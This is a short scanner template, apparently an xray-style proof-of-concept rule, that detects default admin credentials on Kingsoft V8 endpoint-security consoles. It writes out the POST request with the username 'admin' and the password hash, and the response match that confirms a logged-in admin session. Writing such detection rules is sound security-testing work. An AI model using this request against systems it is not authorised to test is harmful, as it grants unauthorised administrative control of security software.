id: kingsoft-v8-default-password

info:
    name: Kingsoft V8 Default Password
    author: B1anda0(https://github.com/B1anda0)
    severity: high

rules:
    r0:
        request:
            method: POST
            path: /inter/ajax.php?cmd=get_user_login_cmd
            body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
expression: r0()

